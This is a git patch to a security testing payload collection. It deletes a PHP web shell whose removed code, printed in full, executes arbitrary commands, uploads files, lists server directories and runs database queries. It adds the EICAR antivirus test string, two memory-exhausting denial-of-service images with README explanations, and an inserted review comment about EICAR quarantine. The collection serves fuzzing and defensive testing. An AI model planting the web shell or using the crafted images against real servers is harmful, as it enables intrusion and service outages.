From 3bdab43348cbdfd98a709e4420030b6fa150ef19 Mon Sep 17 00:00:00 2001
From: Jason Haddix
Date: Sat, 5 Sep 2015 23:28:08 -0700
Subject: [PATCH] files added eicar and img aprser fuzers
---
Payloads/FUZZDB_php-backdoor.php | 71 -------------------------------
Payloads/README.md | 29 +++++++++++++
Payloads/eicar.com.txt | 1 +
Payloads/lottapixel.jpg | Bin 0 -> 4856 bytes
Payloads/uber.gif | Bin 0 -> 920039 bytes
5 files changed, 30 insertions(+), 71 deletions(-)
delete mode 100755 Payloads/FUZZDB_php-backdoor.php
create mode 100644 Payloads/README.md
create mode 100644 Payloads/eicar.com.txt
create mode 100644 Payloads/lottapixel.jpg
create mode 100644 Payloads/uber.gif
diff --git a/Payloads/FUZZDB_php-backdoor.php b/Payloads/FUZZDB_php-backdoor.php
deleted file mode 100755
index 7defd37d..00000000
--- a/Payloads/FUZZDB_php-backdoor.php
+++ /dev/null
@@ -1,71 +0,0 @@ -"; - if ($handle = opendir("$d")) { - echo "

listing of $d

"; - while ($dir = readdir($handle)){ - if (is_dir("$d/$dir")) echo ""; - else echo ""; - echo "$dir\n"; - echo ""; - } - - } else echo "opendir() failed"; - closedir($handle); - die ("
"); -} -if(isset($_REQUEST['c'])){ - echo "
";
-	system($_REQUEST['c']);		   
-	die;
-}
-if(isset($_REQUEST['upload'])){
-
-		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
-			else $dir=$_REQUEST['dir'];
-		$fname=$HTTP_POST_FILES['file_name']['name'];
-		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
-			die('file uploading error.');
-}
-if(isset($_REQUEST['mquery'])){
-	
-	$host=$_REQUEST['host'];
-	$usr=$_REQUEST['usr'];
-	$passwd=$_REQUEST['passwd'];
-	$db=$_REQUEST['db'];
-	$mquery=$_REQUEST['mquery'];
-	mysql_connect("$host", "$usr", "$passwd") or
-    die("Could not connect: " . mysql_error());
-    mysql_select_db("$db");
-    $result = mysql_query("$mquery");
-	if($result!=FALSE) echo "

query was executed correctly

\n"; - while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); - mysql_free_result($result); - die; -} -?> -
execute command:
-
-upload file: to dir:   
-
to browse go to http://?d=[directory here] -
for example: -http://?d=/etc on *nix -or http://?d=c:/windows on win -
execute mysql query: -
-host: user: password: - -database: query: -
- -
diff --git a/Payloads/README.md b/Payloads/README.md
new file mode 100644
index 00000000..d8c70a09
--- /dev/null
+++ b/Payloads/README.md
@@ -0,0 +1,29 @@
+## lottapixel
+
+Originally reported at https://hackerone.com/reports/390, addressed on paperclip.
+
+A specially crafted JPEG (the original file was named lottapixel.jpg) causes attempts to determine the dimensions of the image to exhaust available memory. From the original report:
+
+The exploit is really simple. I have an image of 5kb, 260x260 pixels. In the image itself I exchange the 260x260 values with 0xfafa x 0xfafa (so 64250x64250 pixels). Now from what I remember your service tries to convert the image once uploaded. By loading the 'whole image' into memory, it tries to allocate 4128062500 pixels into memory, flooding the memory and causing DoS.
+
+## uber.gif
+
+Current limits
+
+Image size: 1 MB
+Image dimensions: 2048x2048px
+File types: jpg/png/gif
+
+Another image hack
+
+A GIF composed of 40k 1x1 images made Paperclip freeze until timeout.
+
+As attachments I sent the file composed of 40k images, and a screenshot of the timeout.
+
+## EICAR File
+
+The EICAR Standard Anti-Virus Test File or EICAR test file is a computer file that was developed by the European Institute for Computer Antivirus Research (EICAR) and Computer Antivirus Research Organization (CARO), to test the response of computer antivirus (AV) programs. Instead of using real malware, which could do real damage, this test file allows people to test anti-virus software without having to use a real computer virus.
+
+Anti-virus programmers set the EICAR string as a verified virus, similar to other identified signatures. A compliant virus scanner, when detecting the file, will respond in exactly the same manner as if it found a harmful virus. Not all virus scanners are compliant, and may not detect the file even when they are correctly configured.
+
+The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file.
\ No newline at end of file
diff --git a/Payloads/eicar.com.txt b/Payloads/eicar.com.txt
new file mode 100644
index 00000000..a2463df6
--- /dev/null
+++ b/Payloads/eicar.com.txt
@@ -0,0 +1 @@
+X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
\ No newline at end of file
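Review bot: Committing Payloads/eicar.com.txt means any clone, CI checkout or release archive of this repository will be flagged and likely quarantined by a compliant scanner, and the new README section describes EICAR in general but never states this consequence or names the file. The file itself is correct for its purpose: it holds the standard 68-character EICAR string starting at byte 0 with no trailing newline, which is what detection engines key on, so the `\ No newline at end of file` marker should be kept rather than "fixed" by an editor. I would add one line to the EICAR section of README.md along the lines of `The test string lives in eicar.com.txt; expect endpoint protection to quarantine it (and possibly the whole checkout) on hosts where AV is active, so exclude the Payloads directory there or fetch it only where that is intended.` The README hunk's line count (29) reconciles with the added text, so the file is consistent with its diffstat.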
diff --git a/Payloads/lottapixel.jpg b/Payloads/lottapixel.jpg new file mode 100644 index 0000000000000000000000000000000000000000..e25c2d30156d39d0930a54975211d7339c83b73b GIT binary patch literal 4856 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